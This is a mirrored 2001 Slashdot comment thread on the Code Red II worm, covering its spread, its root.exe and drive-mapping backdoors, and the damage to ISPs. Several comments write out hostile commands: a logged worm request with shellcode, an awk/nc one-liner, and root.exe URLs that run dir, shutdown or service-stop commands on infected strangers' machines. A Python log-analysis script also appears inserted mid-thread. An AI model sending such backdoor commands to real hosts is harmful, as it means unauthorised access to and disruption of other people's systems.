Slashdot Mirror


Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.


  1. Re:test by tulare · · Score: 2

    Click on "Reply to this" just below the story. If you are wanting to submit a story, well... good luck!

    --
    political_news.c: warning: comparison is always true due to limited range of data type
  2. Re:cisco 675 hanging. by ZanshinWedge · · Score: 2
    Nope, there's a better solution. You want to use NAT to redirect port 80. For example, telnetting into the ol' cbos, you'd type something like:

    set nat enable
    set nat entry add [insert outside ip here] 80 10.255.255.200 17000 tcp
    write
    exit


    Or, you could add a filter to deny incoming traffic on port 80.

  3. Cisco 675 CBOS version 2.4.2 by Futurepower(tm) · · Score: 2


    I can handle a limited number of requests.

    I'm running 2.4.2 with no hangs. Cisco made me jump through hoops to get the upgrade.

    Anyone from Cisco know why Cisco makes it so hard for customers?

    --
    Bush's education improvements were
  4. Re:It's not safe to install IIS while on a network by tswinzig · · Score: 2

    Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

    Interesting dilemma... how exactly are these people going to get the patches to be installed with the system unplugged? Microsoft is going to have to release a patch CD.

    --

    "And like that ... he's gone."
  5. Heh... while we're about it by GC · · Score: 2

    I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...

    It took only ten minutes before /var/log/apache/access_log came up with:

    213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281

    Blimey... 10 minutes! This thing is rife!!!

    And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).

  6. Re:Will this wake people up? by mpe · · Score: 2

    There are just too many IIS installations that are run by people who either don't know what they are doing or worse don't even know what IIS or a web server is. That's the problem with these "idiot-proof" GUI webservers...they can be run by idiots.

    It certainly doesn't help that it can take more effort to not install IIS.

  7. Re:cisco 675 hanging. by drsoran · · Score: 2

    Anyone with a Cisco Smartnet contract should be able to download the 2.4.2 image for the 67x series. It's up there on the CCO. If your ISP doesn't have a contract you should suggest that they get one if they are going to continue to support Cisco products. If they use Cisco routers and/or switches they may already have one. Try asking.

  8. Not 'Hacked by Chinese?' by cybermage · · Score: 2, Redundant

    I've gone and hit the addresses showing up in my logs and I haven't seen the tell-tale 'Hacked by Chinese' message. Seems like the new Code Red also leaves the default site at the IP address alone, making it less obvious that a server is infected. Joy.

  9. Re:If this can't break Microsoft's back nothing wi by Tackhead · · Score: 3, Insightful
    > My microwave doesn't blue screen and cook my brain inside out.
    >
    > SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.

    For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.

    But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.

    Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.

    The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

    The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).

    > I hope no one keeps personal, private, confidential and financial data on there pc's.

    The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.

  10. Re:A few more details:It's a root trojan by Malcontent · · Score: 2

    I can't believe people trust their businesses to this crap. That's just too funny.

    --

    War is necrophilia.

  11. Re:the real kicker is by clifyt · · Score: 2

    No, I don't think I did.

    You are right, a well set up unix box takes little time to administer if you leave it static. That is the point. What if your client decided they needed to find a distributed FAX server for their office. It's dead simple to find this stuff and install it and that's what they are looking at. They can call me in for my $75 an hour and end up paying far more in the 3 hours I'm there, and the 5 hours I took to research this stuff...not including fielding the service calls when their secretary needs trained how to use it...than if they would have had the secretary use some of her downtime to do a search for FAX SERVER and WINDOWS NT and find something that worked reasonably well. One of the more technical folks in the office slaps in the card, installs the software and then they call me to come in and do a tweak here or there or ask me if the software looked good in the first place.

    The fact is computers don't need to be 99.999 for most businesses. I DO know what you mean though: My biz partner who handles most of the creative aspects of the biz, didn't even know that 3 of our boxes we had sitting in our racks were Unix based. All he knew was that these were the machines that he never had to touch. He knows all about Windows as he's had to futz with them all the time. Give him unix and he'd be lost...even if ya threw him into KDE or Gnome (two things you'd never see on any of my servers).

    Again, admining a Unix box CAN be cheaper and takes less time, but when I get around to an office once a month, that ain't going to cut it when then need new users added to the system and mail accounts set up...how about a new CGI installed for the webserver...that sorta stuff. Having a geek on call would be perfect, but the cost of a fulltime windows person is still going to be far cheaper than a part time unix person that knows what they are doing.

  12. Remotely disabling root.exe justifiable? by rnt · · Score: 2, Informative

    I'm still doubting if I will run something like this on my machines:

    tail -f /var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'

    In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

    Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

    This root.exe might be a stepup for causing even more problems at a later time!

    Argh, that poses a bit of a moral dilemma for me...

    1. Re:Remotely disabling root.exe justifiable? by SuiteSisterMary · · Score: 2

      Let me clarify this a bit. The worm creates two more web directories, which point to the root of C drive and, if it exists, the root of D drive.

      --
      Vintage computer games and RPG books available. Email me if you're interested.
    2. Re:Remotely disabling root.exe justifiable? by baptiste · · Score: 3, Informative
      Well, no that won't fix it completely - turns out there are a few virtual exploits they put in. From the recent analysis:

      Basically the above code creates a virtual web path (/c and /d) which maps /c to c:\ and /d to d:\. The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system so even if you remove the root.exe (cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would basically look like:

      http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or:
      http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any command an attacker would want to execute.

      As long as the trojan explorer.exe is running then an attacker will be able to remotely access your server.

      Man whoever did this put some thought into it.

  13. In my honor too ... by CodeRed · · Score: 5, Funny

    Errrr.... More things named in my honor... This can't be good!

    If worms start popping up with Linux4Green (my ICQ nick) then I know I'm bad luck. :-P

    --
    CodeRed, the lower user #. No relation to SirCam.
    1. Re:In my honor too ... by DickBreath · · Score: 2

      I wish I could have a virus/worm named after me.

      --

      I'll see your senator, and I'll raise you two judges.
    2. Re:In my honor too ... by Anonymous Coward · · Score: 2, Funny

      At least your name isn't Michael Bolton!

      Your name is Michael Bolton? Wow, like the singer guy?
      Yes, and it's just a coincidence.
      So do you like his music?

    3. Re:In my honor too ... by FauxPasIII · · Score: 3, Informative

      FWIW, it's actually named by the guys who disassembled it after the yummy Mountain Dew beverage. From the bugtraq post:

      We've designated this the .ida "Code Red" worm, because part of the worm is
      designed to deface webpages with the text "Hacked by Chinese" and also
      because code red mountain dew was the only thing that kept us awake all last
      night to be able to disassemble this exploit.

      --
      25% Funny, 25% Insightful, 25% Informative, 25% Troll
  14. A few more details by ryanr · · Score: 5, Informative

    It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.

    We'll have full details posted to the Incidents list shortly.

    1. Re:A few more details by ryanr · · Score: 2

      Took longer than expected (plus I slept a bit in there.. long night :) )

      http://www.securityfocus.com/archive/75/201878
      http://www.securityfocus.com/archive/75/201877

    2. Re:A few more details by ShavenGoat · · Score: 4, Informative

      Apparently the New worm doesn't really kill off the new worm. I was trying the telnet port 80 thing on a machine that was infected with V2.0, whose address was in my logs.

      When I went to telnet, the backdoor didn't work and I got the "Hacked by chinese" message.

      Either the worms over write each other, or a machine can be infected by BOTH worms.

    3. Re:A few more details by dillon_rinker · · Score: 2

      Go to www.eeye.com. They did some extensive analysis of the worm's code.

    4. Re:A few more details by nebby · · Score: 5, Insightful

      I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per se, but perhaps the old code red does something to tell the new code red to "come here" or something?

      The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independent cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.

    5. Re: A few more details by mutende · · Score: 2, Informative
      The new one may still go unnoticed. For some reason "NNNN" generated a malformed URL error in the logs. The new one simply generates a file not found error.

      The new one, the "XXXX" type, also generates a malformed URL -- just like the "NNNN" type does -- the malformedness being the double space between the "=a" and the "HTTP/1.0" parts.

      --
      Unselfish actions pay back better
  15. Re:Free r00t for all! by Malcontent · · Score: 2

    Well I was thinking more along the lines of.

    Industrial espionage, identity theft, blackmail, and general deltree /Y mayhem but whatever floats your boat. The last thing I'd want to do would be actually fix the idiots system.

    --

    War is necrophilia.

  16. Re:Now that is funny! by sharifi · · Score: 2, Interesting

    I tried to visit some of the infected sites in my web log, but most of them gave no response, until I got to http://202.81.246.51 which states: "If you can see this, it means that the installation of the Apache web server software on this system was successful." :)

  17. Re:Ooops bad paste. Take two. by cyberdonny · · Score: 2

    Actually, root.exe is just a copy of cmd.exe, as can be seen by running a dir on c:\winnt\system32\cmd.exe. The different sizes of cmd.exe probably just mean that this is a slightly different version (service pack) of windows, that's all.

  18. Re:@home preventative measures by IronChef · · Score: 2


    In my area, @home can't tell what's out. It takes many hours for an outage to make it onto "the board." If you call before this time, they will make you reboot the computer, reset the modem, etc etc. and then they will schedule a tech to come out. Because, again, let me repeat myself: they have no ability to monitor the network in real-time. I am convinced that "the board" only shows outage data that they collect from outraged customers.

    (side note: the idiot techs always make you reboot... even though the modem's ability to sync to the network has NOTHING TO DO with the kind of computer it is attached to, or even indeed if the computer is ON or OFF. Sigh.)

    @home is a freaking circus. A monkey house.

    I actually prefer it that way, they are apparently too dense to notice all the servers I run in violation of the TOS.

  19. Which port to telnet to? by Sanity · · Score: 2

    My machine has received over 250 hits in the last few hours. I have tried to telnet to them (port 25) but most are connection refused. Which port are you supposed to telnet to, and what do you say?

  20. Re:URM. This is NOT good. GG Microsoft by kilrogg · · Score: 2, Interesting

    Is there a "shutdown -h now" equivalent with windows?

  21. Re:me too by mcleodnine · · Score: 3, Funny
    Several @home customers have written about slowed service today, but they're definitely not alone.

    Should read: Several @Home users reported that everything was moving along normally. Most of their friends giggled and left the room.

    --
    one better than mcleodeight
  22. Re:a quick fix by Saint+Aardvark · · Score: 5, Funny
    Fuck me...read a little farther down where it says that, based on random scans of the 359k IP addresses infected last time 'round, they estimate that thirty percent are still infected!

    What the fuck? What the fuck is going on? How the fuck is it that I can have old ladies calling me up at work (tech support for an ISP) and asking if the reason they can't pick up their email is because of the Code Red worm, 'cos they saw the press conference and, hey, they're wondering, and something like 105,000 separate IP addresses are still infected? Did the rapture happen when I wasn't looking, and God took the people responsible for these computers, those left behind couldn't find the passwords anywhere? How is this possible?

    (I know, I know; not everyone lives w/in viewing distance of CNN, default installations of MS whatever -- but still, this absolutely amazes me.)

  23. My subnet is hit by wilkinsm · · Score: 2

    I'm on a /128 cox at home subnet. It's normally very quiet on my subnet, but since this morning my firewall has been bouncing packets like crazy.

    I guess I'm going to have to put a packet sniffer on the other side of the wall and see what the hell is going on with this code red II.

    1. Re:My subnet is hit by matthewg · · Score: 2, Funny

      Wow, Cox has deployed IPv6 already? ;)

  24. Microsoft or security... by fanatic · · Score: 3, Funny

    ...Pick any one.

    --
    "that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
  25. Re:Why don't they... by Genom · · Score: 2

    Easy. Make it so it isn't a true "worm".

    Make it so it patches against the exploit, then routes all attempted re-exploitation to a small CGI that uses the backdoor to disinfect the attacking system, and install the countermeasure.

    So...assuming you're getting hit with 30 requests an hour from 30 different IPs -- and each of those 30 is getting hit the same way -- the "fix" could propagate itself like wildfire, without being an "active" worm (seeking out hosts to disinfect), but instead being a "passive" worm (waiting for an infected computer to contact it, then disinfecting that computer, and passing on the "passive" disinfector).

    Problem being, it's still modifying the data on someone else's computer, without their knowledge or permission. I believe that makes it illegal -- even if it is working for "good" rather than for "evil".

  26. Release management by cyberdonny · · Score: 2

    Actually, the three variants of the initial worms (1 with broken random number generator, 2 with a fixed one) can be considered roughly the same release. Indeed, apart from the obvious fixes, most code was rigorously identical. So, let's call those 1.0, 1.1 and 1.2. However this one is entirely different, apart from the exploit it uses, and the name CodeRedII. Thus the use of version 2.0 does seem to be justified.

  27. Re:Promise me you'll only use this for good. by nebby · · Score: 2

    Holy shit.

    In the root directory of the drive there's an HTML file with the "Fuck USA goverment" tag or whatever. I am not doing anymore snooping.

    The shit has hit the fan, ladies and gents.

  28. Trained Monkey by Greyfox · · Score: 2
    So you see, with Automatic Volume Recognition your operators can pre-mount labelled tapes on any online tape drive and they'll be allocated to the correct jobs. But this doesn't mean you can hire CHIMPANZEES to run your systems!...
    - IBM Instructor -- "Introduction to System/360," circa 2Q 1966

    Yeah, it's much harder to install Apache. You have to remember how to type "apt-get install apache". Fortunately the Debian people tend to stay pretty well ahead of the security issues, so if you apt-get update ; apt-get upgrade on a regular basis, any newly discovered vulnerabilities will get fixed. Not that Apache's had any major vulnerabilities in a long, long time. Maybe the solution would be to port apt to Windows...

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  29. CodeRedNeck by RoyalTS · · Score: 3, Interesting

    Check out this heise.de article (in German, sorry)!!! Somebody apparently programmed a little Linux tool that may be able to slow the spread of the worm down a little. The idea was first introduced in the incidents.org forum. May be worth a look.

  30. People who don't know they are running IIS by Proud+Geek · · Score: 2

    Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.

    --

    Even Slashdot wants to hide some things

    1. Re:People who don't know they are running IIS by throx · · Score: 2

      FYI, Win2k Professional also runs IIS and would be susceptible to this attack if it is enabled (and unpatched).

      --

      Fear: When you see B8 00 4C CD 21 and know what it means

    2. Re:People who don't know they are running IIS by throx · · Score: 2

      You are wrong.

      Go to "Add/Remove Programs" in "Control Panel" (which should be on your Start Menu). Click on "Add/Remove Windows Components". The second item on the list will be "Internet Information Services (IIS)".

      I didn't pirate anything - they come on my MSDN subscription. Perhaps you should check your facts a little before you post and make an utter fool of yourself?

      You should now go around all those Pro machines you installed and remove the code red worm from them - it's admins like you that cause these things to spread in the first place. I can't believe you didn't even know what you were installing!!

      As for "no servers on Pro" - don't be so stupid and ignorant. File and Print obviously is installed, IIS is installed (as you now know) and you can install other things like MMQ, SMTP, FTP and a whole stack of others if you want.

      --

      Fear: When you see B8 00 4C CD 21 and know what it means

    3. Re:People who don't know they are running IIS by einhverfr · · Score: 2
      Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.

      Well, not so fast. Many people select the wrong option at install on Win 2k pro and run IIS on those machines unknowingly as well.

      --

      LedgerSMB: Open source Accounting/ERP
  31. Re:MSNBC Coverage by tswinzig · · Score: 2

    Yikes... their opening sentence does not bode well for the technical content in the rest of the article...

    "IT WAS NOT IMMEDIATELY clear if the new worm was a variant of Code Red or just a nastier copycat..."

    Mmmkay...

    --

    "And like that ... he's gone."
  32. Re:The solution ? by pirodude · · Score: 2

    might I suggest doing root.exe last? you dont wanna close yout hole for fixing the stuff :)

  33. Of course... by Jason+W · · Score: 3, Insightful
    If you get tired of seeing the requests, you could always shut the server down (the requesting server of course, not yours :).

    Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)

  34. Re:Source? by ksheff · · Score: 4, Informative

    Why not use the sort mentioned in the paper by Uri Guttman and Larry Rosler? It was made for this.

    print join "\n", map substr($_, 4) => sort map pack('C4' => /(\d+)\.(\d+)\.(\d+)\.(\d+)/) . $_ => @ip;
    --
    the good ground has been paved over by suicidal maniacs
  35. From the Windows 2000 EULA by Waffle+Iron · · Score: 3, Interesting
    This Limited Warranty is void if failure of the Product has resulted from accident, abuse, misapplication, abnormal use or a virus.

    Interesting.
    Also...

    Some states/jurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so the above limitation or exclusion may not apply to you.

    Does this really mean anything? Could somebody in some state conceivably sue them successfully? The rest of the EULA is an absolute, complete, iron-clad denial of any liability whatsoever. This last sentence is the only shred of hope I could find.

    OTOH, be careful what you wish for. The GPL has similar disclaimers...

    1. Re:From the Windows 2000 EULA by rgmoore · · Score: 2

      The status of the disclaimers in any EULA is a legal gray area. There just isn't enough case law to be really confident about just how much would fly in court. It's my understanding that some of the things they're trying to disclaim (like the limitation on incidental and consequential damages, or voiding of implied warranty of merchantability) can't be disclaimed even if the buyer wanted to disclaim them for some reason. Of course finding out in court which things were and weren't legal could be pretty interesting and expensive in legal fees. Part of the goal of UCITA was to change the law so that those ridiculous disclaimers would be legally defined to be correct - software merchants would be allowed to disclaim any liability they felt like. That's why it's such a bad idea.

      --

      There's no point in questioning authority if you aren't going to listen to the answers.

    2. Re:From the Windows 2000 EULA by Waffle+Iron · · Score: 2
      Are you implying that people who write GPLed code should give away software *and let people sue them* if it doesn't work right?

      No. I'm saying that if someone manages to collect from MS regardless of what their EULA says, then free software authors could theoretically face similar liabilities regardless of what the GPL says. It's just an observation.

  36. I made a rookie mistake in my story submission by Brian+Stretch · · Score: 4, Informative

    It just occurred to me to look up the definition of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.

    And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?
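The log-reading several posters describe (GC's access_log hit, mutende's NNNN-versus-XXXX distinction, ksheff's numeric IP sort, and Brian Stretch's count of probes sharing the first one or two octets) can be done in one script. The following is an added example written for this page, not code from any of the commenters; the log lines are constructed to mimic the request shapes quoted in the thread, and the local address passed to summarise() is an assumption.

```python
"""Classify Code Red probes in an Apache access log and summarise their sources.

Added example (not from the thread). Detects the original worm (.ida buffer
filled with "N") and Code Red II (filled with "X"), counts how many probes come
from the local host's first octet / first two octets, and sorts source IPs
numerically rather than as strings.
"""
import re
from collections import Counter

# Constructed sample lines in Apache common log format. Request strings are
# shortened stand-ins for the real probes; the trailing "=a  HTTP/1.0" keeps the
# double space mutende mentions.
SAMPLE_LOG = """\
213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a  HTTP/1.0" 404 281
24.3.17.9 - - [05/Aug/2001:14:13:02 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858=a  HTTP/1.0" 404 281
24.7.200.1 - - [05/Aug/2001:14:13:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858=a  HTTP/1.0" 400 281
24.3.99.250 - - [05/Aug/2001:14:14:05 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090=a  HTTP/1.0" 404 281
152.72.10.4 - - [05/Aug/2001:14:15:11 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090=a  HTTP/1.0" 404 281
198.51.100.7 - - [05/Aug/2001:14:15:30 +0100] "GET /index.html HTTP/1.0" 200 1043
"""

# Common log format: ip ident user [timestamp] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3})'
)
# A probe is a GET for /default.ida whose query starts with a run of N or X.
PROBE_RE = re.compile(r'^GET /default\.ida\?(?P<fill>[NX])(?P=fill)+')


def classify(request):
    """Return 'CodeRed', 'CodeRedII' or None for a request string."""
    m = PROBE_RE.match(request)
    if not m:
        return None
    return "CodeRed" if m.group("fill") == "N" else "CodeRedII"


def parse_probes(log_text):
    """Yield (source_ip, variant) for every probe line in the log."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable log line
        variant = classify(m.group("req"))
        if variant:
            probes.append((m.group("ip"), variant))
    return probes


def ip_key(ip):
    """Numeric sort key (tuple of octets), the same idea as packing 'C4' in Perl."""
    return tuple(int(octet) for octet in ip.split("."))


def locality(probes, local_ip):
    """Count probes by shared leading octets with local_ip (the /8 and /16 the
    story submitter loosely called 'Class A' and 'Class B')."""
    local = ip_key(local_ip)
    counts = Counter()
    for ip, _ in probes:
        src = ip_key(ip)
        if src[:2] == local[:2]:
            counts["same_first_two_octets"] += 1
        elif src[:1] == local[:1]:
            counts["same_first_octet_only"] += 1
        else:
            counts["elsewhere"] += 1
    return counts


def summarise(log_text, local_ip):
    probes = parse_probes(log_text)
    return {
        "by_variant": dict(Counter(v for _, v in probes)),
        "locality": dict(locality(probes, local_ip)),
        "sources_sorted": sorted({ip for ip, _ in probes}, key=ip_key),
    }


if __name__ == "__main__":
    # "24.3.55.1" is an assumed local address for the sample data.
    for key, value in summarise(SAMPLE_LOG, "24.3.55.1").items():
        print(f"{key}: {value}")
```

Feed a real access_log through summarise() with your own address to reproduce the "scans within my first two octets" figure; the numeric key is what keeps 24.x.x.x from sorting after 152.x.x.x the way a plain string sort does.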

  37. Re:If this can't break Microsoft's back nothing wi by SlashGeek · · Score: 3, Funny

    As long as they don't change that to the worth of their software, or $5 US, whichever is more.

    --

    --I assume full responsibility for my actions, except the ones that are someone else's fault.

  38. Re:If this can't break Microsoft's back nothing wi by IronChef · · Score: 5, Insightful


    Unlike a car that explodes due to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.

  39. Re:Zero monkeys, ten minutes by leonbrooks · · Score: 2
    Kickstart disks rule! (-:

    I think that if somebody wrote something similar to this for apache, we would get similar results.


    Disagree. Apache doesn't answer requests as root, and the apache user (usually nobody, apache or httpd) can't write anywhere useful. IIS answers requests as the kernel. ACLs? What ACLs? Banzaaai!

    I also routinely mount /var, /home, /tmp all nosuid,nodev to slow down root exploits, and usually mount /boot and /usr readonly to slow down trojans and speed up fscks if the power vanishes. Not a lot of people do this kind of thing, but it's nice to know that Apache itself isn't very vulnerable, and what I'm doing is basically insurance.

    There's also the issue of change and diversity. For example, older Apaches tend to default to /home/httpd/... and newer ones to /var/www/... (and who knows where Slackware would put it?) which would trip over hard-coded paths in attack kits. Likewise, many modern Apache installs (e.g. Mandrake) tend to use virtual hosting for everything. Relying on a specific module, or on the state of a specific feature, would also be a loser. Microsoft == monoculture == fragile.

    Mandrake installed in a server configuration does start a web server (and other things), but it specifically tells you about it during installation, and you have to click [Yes] to make it happen. They also do things like starting with ALL:ALL:DENY in hosts.deny, meaning that even with services running, a cracker's hope is likely to end in futility. Many packagers are following suit.

    Debian's automatic updates also take the dodo-or-busy sysadmin out of the loop. Mandrake, RedHat and others are following suit.

    Summary: no, we wouldn't. Even though there are twice as many Apache sites as IIS. OTOH if M$ also had 95% penetration of the web server market, the Internet as we know it would be history by now.

    --
    Got time? Spend some of it coding or testing
  40. Re:Why don't they... by joshwa · · Score: 2

    where are my mod points when i need them??

  41. Re:All I want to know is by Maditude · · Score: 2, Funny

    ...and I want to know if I'll get spanked for sending my log (367 entries and growing quite quickly) of these default.ida? requests to abuse@microsoft.com ;-)

  42. Re:If this can't break Microsoft's back nothing wi by Tackhead · · Score: 2
    > Essentially, a capability is permission to do something: see a file, read it, delete it, execute it, open a network connection. In such an OS, the web server is giving capabilities to: see everything in its docroot; execute everything in it cgi-bin; receive network connexions. It cannot read your personal data; it cannot open its own network connexion. Done right, it cannot even access libraries it doesn't use. It's a very interesting concept.

    Sounds a bit like the way they're going with SELinux. And yeah, a capability-based OS would rock. Sadly, neither contender for market share (be it any version of 'doze or the various UNIXes/Linuxes) has it yet :(

    For those of you with the free time and desire to write code to make the world a better place, it'd be a hell of a good project to get involved with.

  43. Re:It's certainly more ambitious... by raju1kabir · · Score: 2
    I've had the opposite experience. I got over 60 hits in the first round of the Code Red worm, and 32 from this round tonight.

    It depends on your machine's neighbors. If it's in a subnet with a lot of vulnerable Microsoft machines, it's going to get hammered. If it's in a well-run subnet, it will only see the odd random probes.

    Machines I have in colo centers with small numbers of IPs (backup name servers, etc.) are really getting the treatment. Likewise the servers in a UUnet /26 (so presumably someone else in the Class C is an MS shop - never imagined I'd care). The rest of the stuff, in scattered /24s, is not seeing much of it at all (usually 5 or 6 log entries at this point).

    --
    "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  44. Re:Rooted? Lemme get this straight.... by david+duncan+scott · · Score: 3, Funny

    I prefer the thing I've heard pool players say. It's a combination shot, so they "combinate".

    --

    This next song is very sad. Please clap along. -- Robin Zander

  45. Re:logs by GC · · Score: 2

    That's really nice!

    Here are my logs: here.

    Only 34 so far, but I only decided to open up apache to these this afternoon...

    Cheers for that!

  46. Re:Do what I did... by Ranger+Rick · · Score: 2, Interesting

    Already done it (well, not crashing, but I email hostmaster@their.domain), just do:

    AddHandler cgi-script .ida

    In your httpd.conf and make a little perl script or something called default.ida to log it. It's been great fun, shoulda been to bed hours ago, but I'm playing around with my script instead. =)

    --

    WWJD? JWRTFM!!!

  47. There's probably a phase III by Animats · · Score: 2

    This is a virus that installs a root kit. The question is, why? Clearly this is in preparation for a next phase. Sysadmins need to be thinking ahead on this.

  48. Re:logs by Genom · · Score: 2

    311 here, linux server also running apache =)

  49. shutting down those machines by valentyn · · Score: 2, Informative
    It would be quite easy to shut down those PCs, if there were a "shutdown" command on NT/2k. There isn't; there is one in the Resource Kit but not in the default installation.

    Having said that, you could kill off a Windows PC by issuing

    GET /scripts/root.exe?/c+SHUTDOWN

    Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.

    If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)

    --
    my other sig is a 500 page novel
    1. Re:shutting down those machines by SuiteSisterMary · · Score: 2

      GET /scripts/root.exe?/c+net+stop+"World+Wide+Web+Publishing+Service" should shut down IIS. net stop "World Wide Web Publishing Service" is the functional equivalent of '/etc/rc.d/init.d/httpd stop' on Linux and various UNIXes.

      --
      Vintage computer games and RPG books available. Email me if you're interested.
  50. Re:Why don't they... by rawg · · Score: 3, Insightful

    This will not work. How is your worm going to spread if you fix the system?

    --
    The above is not worth reading.
  51. Re:If this can't break Microsoft's back nothing wi by tswinzig · · Score: 2

    Unlike a car that explodes due to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.

    You left out some key facts:

    - Operating systems are more complex than cars.
    - Operating systems don't require a license to be operated.

    --

    "And like that ... he's gone."
  52. Re:What are you talking about? by sunhou · · Score: 3, Insightful

    • One time out of eight, an entirely random IP address is generated
    • Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
    • Three times out of eight, the lower two octets are randomized (192.168.X.Y)

    This is very interesting. I've recently been studying spatial population models of dispersal, e.g. when trees release seeds, should they go a short distance or a long distance? I.e. which will make them more likely to survive, and what combination of strategies will be evolutionarily stable?

    Short-distance dispersal is best on aggregated landscapes, where good habitat is likely to be nearby, although such strategies end up competing with themselves quite intensely. Long-distance dispersal is good on unclustered landscapes, where you're better off hoping to colonize a good site far away. But it turns out that mixed strategies seem to really kick butt; they exploit local rich patches of resources, but an occasional long-distance propagule allows them to colonize far-off patches once in a great while, and also reduces intraspecific competition somewhat.

    It would be really interesting seeing a few different Code Red's going with different proportions of near versus far dispersal, to see which one does best. It would tell us something about the aggregation of exploitable machines on the net. Although I suppose some people may object to such a study.

    As an AC pointed out in another reply, the really clever thing to do would be to have an adaptive strategy with a bit of randomness in it (i.e. the parameters in the strategy are changing too). That way, it would eventually "find" the strategy that works best, and in fact different subpopulations could converge to different locally optimum strategies.

  53. Re:Hypothesis by SuiteSisterMary · · Score: 2

    Nah, it's a country wide civic holiday, so it'll have different names in different areas.

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  54. Re:A few more details:It's a root trojan by Soko · · Score: 5, Informative
